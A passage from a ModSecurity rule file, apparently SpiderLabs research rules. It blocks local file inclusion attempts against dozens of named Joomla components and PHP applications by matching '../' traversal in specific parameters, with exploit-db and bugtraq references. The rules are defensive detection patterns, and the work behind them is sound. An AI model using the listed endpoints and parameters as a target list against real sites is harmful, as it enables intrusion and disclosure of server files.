Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9706/'" SecRule REQUEST_LINE "@contains /index.php?option=com_album&" "chain" SecRule REQUEST_LINE "@contains Itemid=128&" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /components/com_moofaq/includes/file_includer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009934,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8898/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010780) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mediaslide/viewer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010780,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37440'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_intuit/models/intuit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10730'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:approval "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010942,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11088'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jcollection&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010989) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010989,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37987'" SecRule REQUEST_LINE "@contains /index.php?option=com_ccnewsletter&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010996,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11511'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_communitypolls&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011067) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011067,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_wgpicasa&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009383,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[mosConfig_absolute_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009761) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /include/unverified.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009761,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5179/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /locms/smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010023,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9015/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:cwd "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion SecRule REQUEST_LINE "@contains /snippet.reflect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008898,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7204/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:reflect_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009437,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dirn "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009430,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion SecRule REQUEST_LINE "@contains /include/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pfad/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009330) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /centre.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009330,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6846/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:padmin "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010631) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /infusions/last_seen_users_panel/last_seen_users_panel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010631,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9018/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[locale] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009905) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /forum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009905,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8841/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[UTE][__tplCollection][a][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /news_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009431,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5429/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:newsoffice_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009728,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34636'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains newlang=kacper" "chain" SecRule ARGS:languages[kacper][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009332) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion SecRule REQUEST_LINE "@contains /resource_categories_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009332,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CLASSES_ROOT "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009396) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion SecRule REQUEST_LINE "@contains /ADM_Pagina.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009396,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-5063'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Tipo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/core/security/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009461,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009462) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage1.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009462,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009463) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage4.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009463,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage6.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009464,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /website.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009743,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30176'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008961) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion SecRule REQUEST_LINE "@contains /_conf/core/common-tpl-vars.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008961,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32705'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /chat/dac.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009390,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34213'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:sendChatData "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_words.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009073,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_groups_reapir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009074,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_smilies.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009075,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion SecRule REQUEST_LINE "@contains /message_class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009168,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33718'" SecRule REQUEST_LINE "@contains GET " 